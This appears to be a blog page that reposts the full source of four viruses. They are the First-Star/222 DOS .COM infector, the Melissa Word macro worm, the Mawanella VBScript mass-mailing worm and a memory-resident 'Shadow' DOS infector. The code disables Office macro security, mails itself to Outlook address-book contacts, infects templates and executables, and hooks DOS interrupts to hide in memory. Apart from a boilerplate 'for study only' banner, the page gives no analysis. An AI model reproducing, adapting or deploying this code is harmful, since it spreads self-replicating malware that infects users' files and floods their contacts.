; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;
; First-Star / 222 Virus
;
; (C) by Glenn Benton in 1992
; This is a non-resident direct action .COM infector in current dirs.
;
;
;
Org 0h
Start: Jmp MainVir
Db '*'
MainVir: Call On1
On1: Pop BP
Sub BP,Offset MainVir+3
Push Ax
Mov Ax,Cs:OrgPrg[BP]
Mov Bx,Cs:OrgPrg[BP]+2
Mov Cs:Start+100h,Ax
Mov Cs:Start[2]+100h,Bx
Mov Ah,1ah
Mov Dx,0fd00h
Int 21h
Mov Ah,4eh
Search: Lea Dx,FileSpec[BP]
Xor Cx,Cx
Int 21h
Jnc Found
Jmp Ready
Found: Mov Ax,4300h
Mov Dx,0fd1eh
Int 21h
Push Cx
Mov Ax,4301h
Xor Cx,Cx
Int 21h
Mov Ax,3d02h
Int 21h
Mov Bx,5700h
Xchg Ax,Bx
Int 21h
Push Cx
Push Dx
Mov Ah,3fh
Lea Dx,OrgPrg[BP]
Mov Cx,4
Int 21h
Mov Ax,Cs:[OrgPrg][BP]
Cmp Ax,'MZ'
Je ExeFile
Cmp Ax,'ZM'
Je ExeFile
Mov Ah,Cs:[OrgPrg+3][BP]
Cmp Ah,'*'
Jne Infect
ExeFile: Call Close
Mov Ah,4fh
Jmp Search
FSeek: Xor Cx,Cx
Xor Dx,Dx
Int 21h
Ret
Infect: Mov Ax,4202h
Call FSeek
Sub Ax,3
Mov Cs:CallPtr[BP]+1,Ax
Mov Ah,40h
Lea Dx,MainVir[BP]
Mov Cx,VirLen
Int 21h
Mov Ax,4200h
Call FSeek
Mov Ah,40h
Lea Dx,CallPtr[BP]
Mov Cx,4
Int 21h
Call Close
Ready: Mov Ah,1ah
Mov Dx,80h
Int 21h
Pop Ax
Mov Bx,100h
Push Cs
Push Bx
Retf
Close: Pop Si
Pop Dx
Pop Cx
Mov Ax,5701h
Int 21h
Mov Ah,3eh
Int 21h
Mov Ax,4301h
Pop Cx
Mov Dx,0fd1eh
Int 21h
Push Si
Ret
CallPtr Db 0e9h,0,0
FileSpec Db '*.COM',0
OrgPrg: Int 20h
Nop
Nop
VirLen Equ $-MainVir
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;


Posted by at No comments:

Mellisa virus

####################################melissa###################################// Melissa Virus Source Code
Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\",
"Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =
False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters. Game's over.
I'm outta here."
End Sub
Posted by at No comments:

Manvilla virus

####################################mawanella (original)###################################On Error Resume Next
Rem // I hate Mawanella incident
Set W_S = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr, strMsg
set wscr=CreateObject("WScript.Shell")
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set cFile = fso.GetFile(WScript.ScriptFullName)
cFile.Copy(dirsystem&"\Mawanella.vbs")

Set OutlookA = CreateObject("Outlook.Application")
If OutlookA = "Outlook" Then
Set Mapi=OutlookA.GetNameSpace("MAPI")
Set AddLists=Mapi.AddressLists
For Each ListIndex In AddLists
If ListIndex.AddressEntries.Count <> 0 Then
ContactCountX = ListIndex.AddressEntries.Count
For Count= 1 To ContactCountX
Set MailX = OutlookA.CreateItem(0)
Set ContactX = ListIndex.AddressEntries(Count)
'msgbox contactx.address
'Mailx.Recipients.Add(ContactX.Address)
MailX.To = ContactX.Address
MailX.Subject = "Mawanella"
MailX.Body = vbcrlf&"Mawanella is one of the Sri Lanka's Muslim Village"&vbcrlf
'Set Attachment=MailX.Attachments
'Attachment.Add dirsystem & "\Mawanella.vbs"
'Mailx.Attachments.Add(dirsystem & "\Mawanella.vbs")
Mailx.Attachments.Add(dirsystem & "\Mawanella.vbs")
MailX.DeleteAfterSubmit = True
If MailX.To <> "" Then
MailX.Send
End If
Next
End If
Next
Else
msgBox "Please Forward this to everyone"
End if
strMsg= " ) (" & vbcrlf
strMsg= strMsg & "( ) ( ) " & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " ( ) ( )" & vbcrlf
strMsg= strMsg & " -------------------------" & vbcrlf
strMsg= strMsg & " / ( ( ( /\" & vbcrlf
strMsg= strMsg & " / ( / \" & vbcrlf
strMsg= strMsg & " / ( ( / \" & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & " --- " & vbcrlf
strMsg= strMsg & " ----- " & vbcrlf
strMsg= strMsg & " --- " & vbcrlf
strMsg= strMsg & " " & vbcrlf
strMsg= strMsg & " --------------------------------" & vbcrlf
strMsg= strMsg & "Mawanella is one of the Sri Lanka's Muslim Village." & vbcrlf
strMsg= strMsg & "This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt." & vbcrlf
strMsg= strMsg & "I hat this incident, What about you? I can destroy your computer" & vbcrlf
strMsg= strMsg & "I didn't do that because I am a peace-loving citizen."

msgbox strMsg,,"Mawanella"
End sub
Posted by at No comments:

Shadow virus non Destructive

####################################Shadow Virus - Non Destructive###################################;+----------------------------------------------------------------------------+
Overview
Language - x86 Assembly
Operating Systems - MS-DOS, Windows 95/98
Type - Memory Resident
Files Infected - DOS COM Files (.COM)
Characteristics - Virus Residency Check
The virus uses MCB chaining to hide itself in memory and cannot be viewed by the MEM command
;+----------------------------------------------------------------------------+
CODE_SEG SEGMENT
ASSUME CS:CODE_SEG
ORG 100H
;----------------------------------------------------------------------------
; PROGRAM STARTS HERE
;----------------------------------------------------------------------------
START:
jmp INSTALL_VIRUS ;go to the installation routine
;----------------------------------------------------------------------------
; Data Area
;----------------------------------------------------------------------------
nISRNumber EQU 21h
nVirusID EQU 4B12h ;has to be 4Bxxh where xx=03 to FF
;nVirusSize EQU (offset END_OF_CODE - offset START)
sFileOpen db "Opening File for Read/Write...",0
sFileCheck db "Reading Signature from File...",0
sFileSignature db "Checking Signature...",0
sPointerMoved db "File Pointer Move OK...", 0
sComFile db "File is a .COM File......Infecting File with Virus!!",0
sFileInfected db "File has been infected...",0
sClosingFile db "Closing File...",0
sJumpUpdated db "Jump Instruction Added...", 0
sAlreadyInfected db "File is already infected...",0
_DX_DS dw 2 dup (?) ;DS:DX is stored here, first DX, then DS
db "File Handle:"
wHostFileHandle dw ? ;handle of the host file
;------------------------- DON'T SEPERATE -------------------------
HostBytesNew db 0E9h ;opcode for a JMP instruction
wHostFileLength dw ? ;length of the host file (minus 3)
VirusSignature db "RB" ;signature of the virus
;------------------------- DON'T SEPERATE -------------------------
HostBytesOld db 0CDh, 20h, ?
;first three bytes of host file. The first two bytes are set to
;INT 20h,so that when "this" file is executed without a host,
;it quits when it tries to transfer control to the host.
HostSignature db 2 dup (?) ;the virus signature is stored in bytes
;4 and 5 of the host file. If the file is infected, these bytes
;will be equal to "VirusSignature" defined below
;----------------------------------------------------------------------------
; GetRelocation
;----------------------------------------------------------------------------
; Description
; -> Gets the relocation value (aka delta offset) i.e the value that must
; be added to each variable in the program if the program has been
; relocated. The program gets relocated when it attaches itself to
; the host file. If the program has not been relocated, the value
; returned is 0
; Arguments
; -> Register: Register in which the value is to be stored
; Registers Destroyed
; ->
;____________________________
@GetRelocation MACRO Register
LOCAL GetIPCall
call GetIPCall ;this will push the IP on the stack
GetIPCall:
pop Register
sub Register, offset GetIPCall
ENDM
;----------------------------------------------------------------------------
; SaveRegisters
;----------------------------------------------------------------------------
; Description
; -> Saves the contents of all the registers on the stack
; Arguments
; ->
; Registers Destroyed
; ->
;___________________
@SaveRegisters MACRO
push ax
push bx
push cx
push dx
push es
push ds
push si
push di
push bp
pushf
ENDM
;----------------------------------------------------------------------------
; RestoreRegisters
;----------------------------------------------------------------------------
; Description
; -> Restores the contents of all the registers from the stack
; Arguments
; ->
; Registers Destroyed
; -> ax, bx, cx, dx, es, ds, si, di, bp, flags
;______________________
@RestoreRegisters MACRO
popf
pop bp
pop di
pop si
pop ds
pop es
pop dx
pop cx
pop bx
pop ax
ENDM
;----------------------------------------------------------------------------
; PrintReturnCode
;----------------------------------------------------------------------------
; Description
; -> Displays the return code stored in the register AX
; Arguments
; -> AX contains the code to be displayed
; Registers Destroyed
; ->
;_____________________
@PrintReturnCode MACRO
pushf
push ax
push bx
push cx
xchg ax,cx ;save return code
xor bx,bx
mov ah,0Eh
mov al,ch
add al,'0'
int 10h ;display high bit
mov al,cl
add al,'0'
int 10h ;display low bit
pop cx
pop bx
pop ax
popf
ENDM
;----------------------------------------------------------------------------
; Printf
;----------------------------------------------------------------------------
; Description
; -> Displays a string, and goes to the next line. The string should end
; with a NULL character 0x00
; Arguments
; -> ds:si: Address of the string to be displayed
; Registers Destroyed
; -> ax
;__________
Printf PROC
push bx
mov ah,0Eh ;teletype output
xor bx, bx ;page 0
DISPLAY_CHAR:
lodsb ;get next character
int 10h ;display
test al, al ;end of string?
jne DISPLAY_CHAR
mov al,0Dh ;display carriage return ...
int 10h
mov al,0Ah ;... and line feed
int 10h
pop bx
ret
Printf ENDP
;----------------------------------------------------------------------------
; HookISR
;----------------------------------------------------------------------------
; Description
; -> Installs a new interrupt service routine
; Arguments
; -> AL: Interrupt number
; -> SI: Buffer in which to save old ISR address (DWORD)
; -> DX: Address of new ISR
; Registers Destroyed
; -> ah, bx, es
;___________
HookISR PROC
mov ah, 35h
int 21h ;Get Address of Old ISR
mov word ptr [si], bx ;Save it
mov word ptr [si+2], es
mov ah, 25h ;Install New ISR
int 21h
ret
HookISR ENDP
;----------------------------------------------------------------------------
; NewDosISR
;----------------------------------------------------------------------------
; Description
; -> Replacment ISR for DOS INT 21h
; Arguments
; ->
; Registers Destroyed
; ->
;_____________
NewDosISR PROC
pushf
cmp ax, nVirusID ;function to check residency of virus?
jne NOT_VIRUS_CHECK
popf ;because we pushed the flags before comparing
xchg ax, bx ;tell calling program that we're resident
iret ;return, since we don't have to call old ISR
NOT_VIRUS_CHECK:
cmp ax, 4B00h ;load and execute file?
je EXEC_FN
popf ;because we pushed the flags before comparing
;Û JUMP TO OLD ISR Û
;The following two lines will jump the old ISR
;These lines are equivalent to jmp dwOldExecISR
db 0EAh ;op code for inter segment JMP instruction
dwOldExecISR DD ? ;old ISR address is stored here
EXEC_FN:
popf ;because we pushed the flags before comparing
;Û SAVE FILENAME ADDRESS Û
push bp
@GetRelocation bp
mov cs:bp+_DX_DS, dx ;DS:DX contains the filename. we must save
mov cs:bp+_DX_DS+2, ds ;these, because they will be destroyed after
pop bp ;the call to INT 21h
;Û CALL ROUTINE TO INFECT FILE Û
@SaveRegisters ;we don't want to mess up, since this is an ISR
push cs
push cs
pop ds ;make DS ...
pop es ;... and ES = CS
cli
call InfectFile ;infect the file before it is executed
sti
@RestoreRegisters ;restore before calling orignal ISR
;Û CALL OLD ISR Û
pushf ;because an iret will pop the flags, CS and IP
DB 2Eh, 0FFh, 1Eh ;op code for CALL FAR CS:[xxxx]
dwOldExecISRVariable DW ? ;address of dwOldExecISR (defined above)
;Û UPDATE OLD FLAGS ON STACK Û
pushf ;this is the IMPORTANT part. we must pass the
push bp ;the new flags back, and not the old ones.
push ax
mov bp, sp
mov ax, [bp+4] ;get new flags (which we just pushed 'pushf')
mov [bp+10], ax ;replace the old flags with the new. the stack
pop ax ;initially had FLAGS, CS, IP (in that order)
pop bp
popf
iret
NewDosISR ENDP
;----------------------------------------------------------------------------
; InfectFile
;----------------------------------------------------------------------------
; Description
; -> Attaches the virus to the file (infect) if not already infected
; Arguments
; -> _DX_DS contains the name of the file to be infected
; Registers Destroyed
; -> TODO: ???????
;TODO: Remove read-only/system attributes, and restore when done
;TODO: Time & Date should remain the same
;______________
InfectFile PROC
@GetRelocation bp
lea si,bp+sFileOpen
call Printf
;Û OPEN FILE Û
lds dx, cs:dword ptr [bp+_DX_DS] ;get the file name to be infected
mov si, dx
call Printf ;display the filename
mov ax, 3D02h ;open file for reading/writing
int 21h
pushf
@PrintReturnCode ;display the handle of the file
popf
jnc FILE_OPENED
ret
FILE_OPENED:
mov bp+wHostFileHandle, ax ;save handle
push cs
pop ds ;restore DS
lea si, bp+sFileCheck
call Printf
;Û READ FIRST 5 BYTES Û
mov ah,3Fh ;read ...
mov bx, bp+wHostFileHandle
mov cx,5 ;... 5 bytes from the file
lea dx,bp+HostBytesOld ;address of buffer in which to read
int 21h
pushf
@PrintReturnCode ;display number of bytes read
popf
jnc FILE_READ_OK
jmp CLOSE_FILE
FILE_READ_OK:
lea si,bp+sFileSignature
call Printf
;Û CHECK SIGNATURE Û
xchg di, dx ;CX=buffer where data has been read
mov ax, 5A4Dh ;EXE signature = 'MZ' (M=4Dh, Z=5Ah)
cmp ax, [di]
jne COM_FILE
jmp CLOSE_FILE ;file is an EXE file, cannot infect
COM_FILE:
lea si,bp+sComFile
call Printf
;Û CHECK FILE FOR PRIOR INFECTION Û
mov ax,[di+3] ;get host signature
lea bx,bp+VirusSignature
cmp ax, [bx] ;check signature
jne FILE_NOT_INFECTED
lea si,bp+sAlreadyInfected
call Printf
jmp CLOSE_FILE
FILE_NOT_INFECTED:
;Û ADD CODE TO HOST FILE Û
mov ax, 4202h ;go to end-of-file
mov bx, bp+wHostFileHandle
xor cx, cx
xor dx, dx
int 21h
jnc MOVE_PTR_OK
jmp CLOSE_FILE
MOVE_PTR_OK:
sub ax, 3 ;length of a JMP instruction (E9 xx xx)
mov bp+wHostFileLength, ax ;save the length of the file (minus 3)
lea si,bp+sPointerMoved
call Printf
mov ah,40h ;append virus code
mov bx, bp+wHostFileHandle
lea dx, bp+START
mov cx, offset END_OF_CODE-offset START
int 21h
jc CLOSE_FILE
lea si, bp+sFileInfected
call Printf
;Û ADD JMP INSTRUCTION TO BEGINNING OF HOST Û
mov ax, 4200h ;go to beginning-of-file
mov bx, bp+wHostFileHandle
xor cx, cx
xor dx, dx
int 21h
jc CLOSE_FILE
@PrintReturnCode
lea si,bp+sPointerMoved
call Printf
mov ah, 40h ;write the jmp instruction to the file
mov bx, bp+wHostFileHandle
lea dx, bp+HostBytesNew
mov cx, 5 ;3 for the jmp instruction, and 2 for ...
int 21h ;... the virus signature
jc CLOSE_FILE
lea si,bp+sJumpUpdated
call Printf
@PrintReturnCode
CLOSE_FILE: ;Û CLOSE FILE Û
lea si, bp+sClosingFile
call Printf
mov ah,3Eh
mov bx, bp+wHostFileHandle
int 21h
@PrintReturnCode
ret
InfectFile ENDP
;----------------------------------------------------------------------------
; INSTALL_VIRUS
;----------------------------------------------------------------------------
INSTALL_VIRUS:
@GetRelocation bp
;Û VIRUS RESIDENCY CHECK Û
mov ax, nVirusID
int 21h
cmp bx, nVirusID ;virus installed?
je VIRUS_ALREADY_INSTALLED
;Û RESIZE MEMORY BLOCK Û
mov ax, ds
dec ax
mov es, ax ;get MCB
cmp byte ptr es:[0],'Z' ;is it the last MCB in the chain?
jne CANNOT_INSTALL
mov bx, es:[3] ;get block size
sub bx, ((offset END_OF_CODE-offset START+15)/16)+1 ;compute new block size in paragraphs
push ds
pop es
mov ah, 4Ah ;resize memory block
int 21h
;Û ALLOCATE MEMORY Û
mov ah, 48h ;allocate memory for the virus
mov bx, (offset END_OF_CODE-offset START+15)/16
int 21h ;AX will contain segment of allocated block
;Û UPDATE MCB Û
dec ax
mov es, ax ;get MCB
mov byte ptr es:[0], 'Z' ;mark MCB as last in chain
mov word ptr es:[1], 8 ;mark DOS as owner of memory block
;****TESTING
;sub word ptr ds:[2], (offset END_OF_CODE-offset START+15)/16
;****TESTING
;Û COPY VIRUS TO NEW MEMORY BLOCK Û
inc ax
mov es, ax ;get memory block
xor di, di ;destination address
lea si, bp+START ;start of virus code in memory
mov cx, offset END_OF_CODE-offset START
cld
rep movsb ;copy virus
int 3h
push es
pop ds ;make DS = segment of newly allocated block
mov ax, 40h
mov es, ax ;get BIOS segment
sub word ptr es:[13h], (offset END_OF_CODE-offset START+1023)/1024
;reduce available memory
;Û INSTALL NEW ISR FOR INT 21h Û
mov al, nISRNumber
lea si, dwOldExecISR-100h
lea dx, NewDosISR-100h
call HookISR
;Û UPDATE CALL INSTRUCTION IN NewExecISR Û
mov ds:[dwOldExecISRVariable-100h],si ;update CALL FAR CS:[xxxx] instruction
;in PROC NewDOSISR
CANNOT_INSTALL:
VIRUS_ALREADY_INSTALLED:
;Û TRANSFER CONTROL TO HOST PROGRAM Û
push cs
push cs
pop ds
pop es
mov di, 100h
lea si, bp+HostBytesOld
mov cx,5 ;restore 5 bytes
rep movsb
mov bx, 100h
push bx
ret ;transfer to host program
;----------------------------------------------------------------------------
; END_OF_CODE
;----------------------------------------------------------------------------
END_OF_CODE:
CODE_SEG ENDS
END START
Posted by at No comments:
Subscribe to: Posts (Atom)